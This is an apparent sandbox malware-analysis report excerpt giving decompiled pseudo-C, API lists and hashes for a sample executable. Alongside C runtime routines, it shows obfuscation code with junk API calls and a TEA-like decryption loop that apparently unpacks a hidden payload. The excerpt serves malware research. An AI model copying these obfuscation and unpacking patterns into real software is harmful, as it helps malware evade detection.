                    • Instruction Fuzzy Hash: B3D0A732550304AFDB109F75BD087273BDCD3883A5F044476F90CD61A0F675C980C648
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 72 40899c-40899e call 40892a 74 4089a3-4089a4 72->74
                    C-Code - Quality: 100%
                    			E0040899C() {
                    				void* _t1;
                    
                    				_t1 = E0040892A(0); // executed
                    				return _t1;
                    			}

                    APIs
                    • __encode_pointer.LIBCMT ref: 0040899E
                      • Part of subcall function 0040892A: TlsGetValue.KERNEL32(00000000,?,004089A3,00000000,004135CD,0047EB20,00000000,00000314,?,0040C734,0047EB20,Microsoft Visual C++ Runtime Library,00012010), ref: 0040893C
                      • Part of subcall function 0040892A: TlsGetValue.KERNEL32(00000002,?,004089A3,00000000,004135CD,0047EB20,00000000,00000314,?,0040C734,0047EB20,Microsoft Visual C++ Runtime Library,00012010), ref: 00408953
                      • Part of subcall function 0040892A: RtlEncodePointer.NTDLL(00000000,?,004089A3,00000000,004135CD,0047EB20,00000000,00000314,?,0040C734,0047EB20,Microsoft Visual C++ Runtime Library,00012010), ref: 00408991
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: Value$EncodePointer__encode_pointer
                    • String ID:
                    • API String ID: 2585649348-0
                    • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                    • Instruction ID: 02e34f1245a565ddb697b8bc2cd3855ae91f2fcba4abb84b0cf70a8bb5c8c627
                    • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E00407AAB(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                    				intOrPtr _v0;
                    				void* _v804;
                    				intOrPtr _v808;
                    				intOrPtr _v812;
                    				intOrPtr _t6;
                    				intOrPtr _t11;
                    				intOrPtr _t12;
                    				intOrPtr _t13;
                    				long _t17;
                    				intOrPtr _t21;
                    				intOrPtr _t22;
                    				intOrPtr _t25;
                    				intOrPtr _t26;
                    				intOrPtr _t27;
                    				intOrPtr* _t31;
                    				void* _t34;
                    
                    				_t27 = __esi;
                    				_t26 = __edi;
                    				_t25 = __edx;
                    				_t22 = __ecx;
                    				_t21 = __ebx;
                    				_t6 = __eax;
                    				_t34 = _t22 -  *0x41a224; // 0xbfb39b89
                    				if(_t34 == 0) {
                    					asm("repe ret");
                    				}
                    				 *0x47f050 = _t6;
                    				 *0x47f04c = _t22;
                    				 *0x47f048 = _t25;
                    				 *0x47f044 = _t21;
                    				 *0x47f040 = _t27;
                    				 *0x47f03c = _t26;
                    				 *0x47f068 = ss;
                    				 *0x47f05c = cs;
                    				 *0x47f038 = ds;
                    				 *0x47f034 = es;
                    				 *0x47f030 = fs;
                    				 *0x47f02c = gs;
                    				asm("pushfd");
                    				_pop( *0x47f060);
                    				 *0x47f054 =  *_t31;
                    				 *0x47f058 = _v0;
                    				 *0x47f064 =  &_a4;
                    				 *0x47efa0 = 0x10001;
                    				_t11 =  *0x47f058; // 0x0
                    				 *0x47ef54 = _t11;
                    				 *0x47ef48 = 0xc0000409;
                    				 *0x47ef4c = 1;
                    				_t12 =  *0x41a224; // 0xbfb39b89
                    				_v812 = _t12;
                    				_t13 =  *0x41a228; // 0x404c6476
                    				_v808 = _t13;
                    				 *0x47ef98 = IsDebuggerPresent();
                    				_push(1);
                    				E004088A3(_t14);
                    				SetUnhandledExceptionFilter(0);
                    				_t17 = UnhandledExceptionFilter("H\xefG");
                    				if( *0x47ef98 == 0) {
                    					_push(1);
                    					E004088A3(_t17);
                    				}
                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                    			}

                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 0040DCA7
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040DCBC
                    • UnhandledExceptionFilter.KERNEL32(HG), ref: 0040DCC7
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0040DCE3
                    • TerminateProcess.KERNEL32(00000000), ref: 0040DCEA
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID: HG$vdL@
                    • API String ID: 2579439406-3365594438
                    • Opcode ID: c968fc26dad764d8bb3b27da463ee2b1ac94b68773e3d7493b1255c70e2866d0
                    • Instruction ID: abda904b53807bb75eb126b1944003bcfc5e7a389ebb07586c1cf06103884214
                    • Opcode Fuzzy Hash: c968fc26dad764d8bb3b27da463ee2b1ac94b68773e3d7493b1255c70e2866d0
                    • Instruction Fuzzy Hash: 2521CFB8801284DFD710DF65EA856443BF4BB09314B10807AE50DA77B2E7B865C98F5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040C27F() {
                    
                    				SetUnhandledExceptionFilter(E0040C23D);
                    				return 0;
                    			}

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000C23D), ref: 0040C284
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: e8adb6c1ff60520eeb7d63791d4aa3345d15e8c7c95c6ad18d95786b905b9a10
                    • Instruction ID: 54c73ad5e31d9162a6a2fc8e45ef39e692352da58bd788bd34167f22968144bd
                    • Opcode Fuzzy Hash: e8adb6c1ff60520eeb7d63791d4aa3345d15e8c7c95c6ad18d95786b905b9a10
                    • Instruction Fuzzy Hash: C390026066114186C60417B05E4A64625915A59702B5146B96581E4CA4EA744040655A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 60%
                    			E00405800() {
                    				intOrPtr _v8;
                    				unsigned int _v12;
                    				long _v16;
                    				char _v20;
                    				long _v24;
                    				char _v572;
                    				char _v1596;
                    				char _v2620;
                    				char _v3644;
                    				char _v5692;
                    				unsigned int _t18;
                    				unsigned int _t19;
                    				intOrPtr* _t36;
                    				intOrPtr _t37;
                    				intOrPtr* _t44;
                    
                    				E00413F00(0x163c);
                    				_t18 =  *0x47f7d4; // 0x5f7d0
                    				_t37 =  *0x47f73c; // 0x0
                    				_t19 = _t18 >> 3;
                    				if(_t19 > 0) {
                    					_t44 = __imp__SetFileValidData;
                    					_t36 = __imp__DnsHostnameToComputerNameW;
                    					_v8 = _t37;
                    					_v12 = _t19;
                    					do {
                    						_t47 =  *0x47f7d4 - 0x5d;
                    						if( *0x47f7d4 == 0x5d) {
                    							GlobalGetAtomNameA(0,  &_v1596, 0);
                    							 *_t44(0, 0, 0);
                    							 *_t36(0,  &_v5692,  &_v20);
                    							WriteConsoleW(0, 0, 0,  &_v24, 0);
                    							__imp__GetConsoleAliasA(0,  &_v3644, 0, 0);
                    							LCMapStringA(0, 0, "tegegefisisarehajabi", 0,  &_v2620, 0);
                    							VirtualProtect(0, 0, 0, 0);
                    							LoadLibraryW(L"yafomumodiyohazeminuxuzupijuhizinixovosumib");
                    							__imp__EnumCalendarInfoExA(0, 0, 0, 0);
                    							WriteConsoleA(0, 0, 0,  &_v16, 0);
                    							__imp__GetConsoleAliasExesLengthA();
                    							IsBadHugeReadPtr(0, 0);
                    							__imp__GetCPInfoExW(0, 0,  &_v572);
                    							SetCommTimeouts(0, 0);
                    							IsBadStringPtrW(L"tofafulatayobejazumuvulevijufixirosurupuz", 0);
                    							FindResourceExW(0, L"mayuziwabasorukayazezepokotinifexuxodiruxiluyopetidoka", L"humar", 0);
                    							EnumResourceTypesA(0, 0, 0);
                    						}
                    						_t19 = E00405630(_t47, _v8);
                    						_v8 = _v8 + 8;
                    						_t14 =  &_v12;
                    						 *_t14 = _v12 - 1;
                    					} while ( *_t14 != 0);
                    				}
                    				return _t19;
                    			}

                    APIs
                    • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00405856
                    • SetFileValidData.KERNEL32(00000000,00000000,00000000), ref: 0040585E
                    • DnsHostnameToComputerNameW.KERNEL32 ref: 0040586D
                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040587B
                    • GetConsoleAliasA.KERNEL32(00000000,?,00000000,00000000), ref: 0040588E
                    • LCMapStringA.KERNEL32(00000000,00000000,tegegefisisarehajabi,00000000,?,00000000), ref: 004058A8
                    • VirtualProtect.KERNEL32(00000000,00000000,00000000,00000000), ref: 004058B6
                    • LoadLibraryW.KERNEL32(yafomumodiyohazeminuxuzupijuhizinixovosumib), ref: 004058C1
                    • EnumCalendarInfoExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004058CF
                    • WriteConsoleA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058E1
                    • GetConsoleAliasExesLengthA.KERNEL32 ref: 004058E7
                    • IsBadHugeReadPtr.KERNEL32 ref: 004058F1
                    • GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 00405902
                    • SetCommTimeouts.KERNEL32(00000000,00000000), ref: 0040590C
                    • IsBadStringPtrW.KERNEL32 ref: 00405919
                    • FindResourceExW.KERNEL32(00000000,mayuziwabasorukayazezepokotinifexuxodiruxiluyopetidoka,humar,00000000), ref: 0040592D
                    • EnumResourceTypesA.KERNEL32 ref: 00405939
                    Strings
                    • tegegefisisarehajabi, xrefs: 0040589F
                    • humar, xrefs: 00405921
                    • yafomumodiyohazeminuxuzupijuhizinixovosumib, xrefs: 004058BC
                    • tofafulatayobejazumuvulevijufixirosurupuz, xrefs: 00405914
                    • mayuziwabasorukayazezepokotinifexuxodiruxiluyopetidoka, xrefs: 00405926
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: Console$AliasEnumInfoNameResourceStringWrite$AtomCalendarCommComputerDataExesFileFindGlobalHostnameHugeLengthLibraryLoadProtectReadTimeoutsTypesValidVirtual
                    • String ID: humar$mayuziwabasorukayazezepokotinifexuxodiruxiluyopetidoka$tegegefisisarehajabi$tofafulatayobejazumuvulevijufixirosurupuz$yafomumodiyohazeminuxuzupijuhizinixovosumib
                    • API String ID: 3161774360-146515975
                    • Opcode ID: 0ee4b546dd6db8f73c3634e0e59e5001217e265bf0095ff9f7d747e5e145056f
                    • Instruction ID: 92dd6cbcaf02eda086cdfc334d8d842c294cf1474bb42bb6431eef058b61f3b7
                    • Opcode Fuzzy Hash: 0ee4b546dd6db8f73c3634e0e59e5001217e265bf0095ff9f7d747e5e145056f
                    • Instruction Fuzzy Hash: 2231ED75784344BBF760AB90DE4AF9A7728EB44B02F204065F749BA5E0C6B425848F6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E00405630(void* __eflags, unsigned int* _a4) {
                    				signed int _v12;
                    				signed int _v16;
                    				char _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				CHAR* _v32;
                    				signed int _v36;
                    				char _v40;
                    				intOrPtr _v44;
                    				intOrPtr _v48;
                    				intOrPtr _v52;
                    				intOrPtr _v56;
                    				intOrPtr _v60;
                    				long _v64;
                    				long _v68;
                    				struct _INPUT_RECORD _v88;
                    				struct _WIN32_FIND_DATAW _v680;
                    				void _v1112;
                    				unsigned int* _t69;
                    				intOrPtr _t70;
                    				intOrPtr _t73;
                    				signed int _t75;
                    				signed int _t88;
                    				unsigned int* _t90;
                    				intOrPtr _t100;
                    				intOrPtr _t101;
                    				intOrPtr _t111;
                    				unsigned int _t119;
                    				unsigned int _t120;
                    
                    				_t69 = _a4;
                    				_t100 =  *0x41b54c; // 0xd3ff37d4
                    				_t120 = _t69[1];
                    				_t119 =  *_t69;
                    				_t70 =  *0x41b548; // 0x7512338e
                    				_v56 = _t70;
                    				_v36 = _t119;
                    				_v20 = 0;
                    				_v48 = 0x9e3779b9;
                    				_v52 = _t100;
                    				E00405610( &_v20);
                    				_t111 =  *0x41b550; // 0xc3421911
                    				_t73 =  *0x41b554; // 0x2a80d8b8
                    				_v20 = _v20 + 0x23f;
                    				_v44 = _t111;
                    				_v60 = _t73;
                    				_v40 = 0x20;
                    				do {
                    					_v28 = 2;
                    					_v28 = _v28 + 3;
                    					_t101 =  *0x47f7d4; // 0x5f7d0
                    					_t75 = _t119 << 4;
                    					_v16 = _t75;
                    					if(_t101 == 0xc) {
                    						FindNextFileW(0,  &_v680);
                    						_t75 = _v16;
                    						_t101 =  *0x47f7d4; // 0x5f7d0
                    					}
                    					_v16 = _t75 + _v44;
                    					if(_t101 != 0xfa9) {
                    						if(_t101 == 0x3eb) {
                    							GetFileAttributesExW(L"cesufujuje", 0,  &_v1112);
                    							__imp__SetVolumeMountPointW(L"ditevekamodom", L"moyihikeguwuvicuwitalalel");
                    							 *0x47f738 = 0;
                    						}
                    					} else {
                    						 *0x47f7d0 = 0xedeb2e40;
                    					}
                    					_v24 = _v36;
                    					_v24 = _v24 + _v20;
                    					 *0x47f7cc = 0xf4ea3dee;
                    					_v12 = _t119 >> _v28;
                    					E00405620( &_v12, _v60);
                    					_v16 = _v16 ^ _v24;
                    					_v12 = _v12 ^ _v16;
                    					if( *0x47f7d4 == 0xc6e) {
                    						WaitNamedPipeW(0, 0);
                    						ReadConsoleInputA(0,  &_v88, 0,  &_v64);
                    						CreateEventW(0, 0, 0, L"huletisulori");
                    						MoveFileExA(0, 0, 0);
                    						InterlockedDecrement( &_v68);
                    					}
                    					_t120 = _t120 - _v12;
                    					_v32 = 0;
                    					_v32 = _v32 - 0x5396dd36;
                    					_v32 =  &(_v32[0x5396dd3a]);
                    					_v24 = _v20 + _t120;
                    					_v16 = (_t120 << _v32) + _v56;
                    					_v12 = _t120 >> _v28;
                    					_v12 = _v12 + _v52;
                    					_t88 = _v16 ^ _v12 ^ _v24;
                    					_t119 = _t119 - _t88;
                    					_v16 = _t88;
                    					 *0x47f594 = 0;
                    					_v36 = _t119;
                    					_v20 = _v20 - _v48;
                    					_t65 =  &_v40;
                    					 *_t65 = _v40 - 1;
                    				} while ( *_t65 != 0);
                    				_t90 = _a4;
                    				 *_t90 = _t119;
                    				_t90[1] = _t120;
                    				return _t90;
                    			}

                    APIs
                    • FindNextFileW.KERNEL32(00000000,?), ref: 004056B6
                    • GetFileAttributesExW.KERNEL32(cesufujuje,00000000,?), ref: 004056F4
                    • SetVolumeMountPointW.KERNEL32(ditevekamodom,moyihikeguwuvicuwitalalel), ref: 00405704
                    • WaitNamedPipeW.KERNEL32(00000000,00000000), ref: 00405755
                    • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00405765
                    • CreateEventW.KERNEL32(00000000,00000000,00000000,huletisulori), ref: 00405773
                    • MoveFileExA.KERNEL32 ref: 0040577C
                    • InterlockedDecrement.KERNEL32(?), ref: 00405786
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: File$AttributesConsoleCreateDecrementEventFindInputInterlockedMountMoveNamedNextPipePointReadVolumeWait
                    • String ID: $cesufujuje$ditevekamodom$huletisulori$moyihikeguwuvicuwitalalel
                    • API String ID: 4004417059-1439129243
                    • Opcode ID: 54aa24edc93e98ad6bfa2e96428d9f5e4bb01055abca42d38b07a313ea44f9bd
                    • Instruction ID: 9f647ab1219f549f5f0ea101fe9e079e524831e20b4a609b2352e9af775f8545
                    • Opcode Fuzzy Hash: 54aa24edc93e98ad6bfa2e96428d9f5e4bb01055abca42d38b07a313ea44f9bd
                    • Instruction Fuzzy Hash: 685108B1D00219EFCB04DFA9D9849AEBBF9FF48314F50846AE505B7250D7349A84CF68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E00408A91(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				struct HINSTANCE__* _t23;
                    				intOrPtr _t28;
                    				intOrPtr _t32;
                    				intOrPtr _t45;
                    				void* _t46;
                    
                    				_t35 = __ebx;
                    				_push(0xc);
                    				_push(0x418208);
                    				E00409480(__ebx, __edi, __esi);
                    				_t44 = L"KERNEL32.DLL";
                    				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                    				if(_t23 == 0) {
                    					_t23 = E0040C28D(_t44);
                    				}
                    				 *(_t46 - 0x1c) = _t23;
                    				_t45 =  *((intOrPtr*)(_t46 + 8));
                    				 *((intOrPtr*)(_t45 + 0x5c)) = 0x402580;
                    				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                    				if(_t23 != 0) {
                    					_t35 = GetProcAddress;
                    					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                    					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                    				}
                    				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                    				 *((char*)(_t45 + 0xc8)) = 0x43;
                    				 *((char*)(_t45 + 0x14b)) = 0x43;
                    				 *(_t45 + 0x68) = 0x41a9a8;
                    				E0040E117(_t35, 1, 0xd);
                    				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                    				InterlockedIncrement( *(_t45 + 0x68));
                    				 *(_t46 - 4) = 0xfffffffe;
                    				E00408B66();
                    				E0040E117(_t35, 1, 0xc);
                    				 *(_t46 - 4) = 1;
                    				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                    				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                    				if(_t28 == 0) {
                    					_t32 =  *0x41a998; // 0x41a8c0
                    					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                    				}
                    				E0040FD56( *((intOrPtr*)(_t45 + 0x6c)));
                    				 *(_t46 - 4) = 0xfffffffe;
                    				return E004094C5(E00408B6F());
                    			}

                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00418208,0000000C,00408BCC,00000000,00000000,?,004064B6,00000000), ref: 00408AA3
                    • __crt_waiting_on_module_handle.LIBCMT ref: 00408AAE
                      • Part of subcall function 0040C28D: Sleep.KERNEL32(000003E8,00000000,?,004089F4,KERNEL32.DLL,?,00408A40,?,004064B6,00000000), ref: 0040C299
                      • Part of subcall function 0040C28D: GetModuleHandleW.KERNEL32(?,?,004089F4,KERNEL32.DLL,?,00408A40,?,004064B6,00000000), ref: 0040C2A2
                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00408AD7
                    • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00408AE7
                    • __lock.LIBCMT ref: 00408B09
                    • InterlockedIncrement.KERNEL32(0041A9A8), ref: 00408B16
                    • __lock.LIBCMT ref: 00408B2A
                    • ___addlocaleref.LIBCMT ref: 00408B48
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                    • API String ID: 1028249917-2843748187
                    • Opcode ID: c39dd4ac0b90baf1befea7c60646309bdcf6c2805d90b0d35215f05225c0d462
                    • Instruction ID: 4f95acfd8db2e8c55b01b0affb8241dd3069e1935a20304c2c73b96ecf2aa1dd
                    • Opcode Fuzzy Hash: c39dd4ac0b90baf1befea7c60646309bdcf6c2805d90b0d35215f05225c0d462
                    • Instruction Fuzzy Hash: FA118E709017019FD720AF369941B5ABBE0AF44318F10897FE4A9B62E1CB78A9408F5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0040B81A(signed int __edx, char _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t59;
                    				intOrPtr* _t61;
                    				signed int _t63;
                    				void* _t68;
                    				signed int _t69;
                    				signed int _t72;
                    				signed int _t74;
                    				signed int _t75;
                    				signed int _t77;
                    				signed int _t78;
                    				signed int _t81;
                    				signed int _t82;
                    				signed int _t84;
                    				signed int _t88;
                    				signed int _t97;
                    				signed int _t98;
                    				signed int _t99;
                    				intOrPtr* _t100;
                    				void* _t101;
                    
                    				_t90 = __edx;
                    				if(_a8 == 0 || _a12 == 0) {
                    					L4:
                    					return 0;
                    				} else {
                    					_t100 = _a16;
                    					if(_t100 != 0) {
                    						_t4 =  &_a4; // 0x406456
                    						_t82 =  *_t4;
                    						__eflags = _t82;
                    						if(_t82 == 0) {
                    							goto L3;
                    						}
                    						_t63 = _t59 | 0xffffffff;
                    						_t90 = _t63 % _a8;
                    						__eflags = _a12 - _t63 / _a8;
                    						if(_a12 > _t63 / _a8) {
                    							goto L3;
                    						}
                    						_t97 = _a8 * _a12;
                    						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                    						_v8 = _t82;
                    						_v16 = _t97;
                    						_t81 = _t97;
                    						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                    							_v12 = 0x1000;
                    						} else {
                    							_v12 =  *(_t100 + 0x18);
                    						}
                    						__eflags = _t97;
                    						if(_t97 == 0) {
                    							L32:
                    							return _a12;
                    						} else {
                    							do {
                    								_t84 =  *(_t100 + 0xc) & 0x00000108;
                    								__eflags = _t84;
                    								if(_t84 == 0) {
                    									L18:
                    									__eflags = _t81 - _v12;
                    									if(_t81 < _v12) {
                    										_t68 = E0040B6B6(_t97,  *_v8, _t100);
                    										__eflags = _t68 - 0xffffffff;
                    										if(_t68 == 0xffffffff) {
                    											L34:
                    											_t69 = _t97;
                    											L35:
                    											return (_t69 - _t81) / _a8;
                    										}
                    										_v8 = _v8 + 1;
                    										_t72 =  *(_t100 + 0x18);
                    										_t81 = _t81 - 1;
                    										_v12 = _t72;
                    										__eflags = _t72;
                    										if(_t72 <= 0) {
                    											_v12 = 1;
                    										}
                    										goto L31;
                    									}
                    									__eflags = _t84;
                    									if(_t84 == 0) {
                    										L21:
                    										__eflags = _v12;
                    										_t98 = _t81;
                    										if(_v12 != 0) {
                    											_t75 = _t81;
                    											_t90 = _t75 % _v12;
                    											_t98 = _t98 - _t75 % _v12;
                    											__eflags = _t98;
                    										}
                    										_push(_t98);
                    										_push(_v8);
                    										_push(E0040A7A8(_t100));
                    										_t74 = E00412F17(_t81, _t90, _t98, _t100, __eflags);
                    										_t101 = _t101 + 0xc;
                    										__eflags = _t74 - 0xffffffff;
                    										if(_t74 == 0xffffffff) {
                    											L36:
                    											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                    											_t69 = _v16;
                    											goto L35;
                    										} else {
                    											_t88 = _t98;
                    											__eflags = _t74 - _t98;
                    											if(_t74 <= _t98) {
                    												_t88 = _t74;
                    											}
                    											_v8 = _v8 + _t88;
                    											_t81 = _t81 - _t88;
                    											__eflags = _t74 - _t98;
                    											if(_t74 < _t98) {
                    												goto L36;
                    											} else {
                    												L27:
                    												_t97 = _v16;
                    												goto L31;
                    											}
                    										}
                    									}
                    									_t77 = E0040BACD(_t100);
                    									__eflags = _t77;
                    									if(_t77 != 0) {
                    										goto L34;
                    									}
                    									goto L21;
                    								}
                    								_t78 =  *(_t100 + 4);
                    								__eflags = _t78;
                    								if(__eflags == 0) {
                    									goto L18;
                    								}
                    								if(__eflags < 0) {
                    									_t48 = _t100 + 0xc;
                    									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                    									__eflags =  *_t48;
                    									goto L34;
                    								}
                    								_t99 = _t81;
                    								__eflags = _t81 - _t78;
                    								if(_t81 >= _t78) {
                    									_t99 = _t78;
                    								}
                    								E0040AFE0(_t81, _t99, _t100,  *_t100, _v8, _t99);
                    								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                    								 *_t100 =  *_t100 + _t99;
                    								_t101 = _t101 + 0xc;
                    								_t81 = _t81 - _t99;
                    								_v8 = _v8 + _t99;
                    								goto L27;
                    								L31:
                    								__eflags = _t81;
                    							} while (_t81 != 0);
                    							goto L32;
                    						}
                    					}
                    					L3:
                    					_t61 = E00407E97();
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					 *_t61 = 0x16;
                    					E00406B09(_t90, 0, _t100);
                    					goto L4;
                    				}
                    			}






























                    APIs
                    • __flush.LIBCMT ref: 0040B8DE
                    • __fileno.LIBCMT ref: 0040B8FE
                    • __locking.LIBCMT ref: 0040B905
                    • __flsbuf.LIBCMT ref: 0040B930
                      • Part of subcall function 00407E97: __getptd_noexit.LIBCMT ref: 00407E97
                      • Part of subcall function 00406B09: __decode_pointer.LIBCMT ref: 00406B14
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                    • String ID: Vd@$Vd@
                    • API String ID: 3240763771-651400110
                    • Opcode ID: ce7b5e8e5fb3aa8fe84a3559882d5a7ebb0664181da7507086c62e3b69baa235
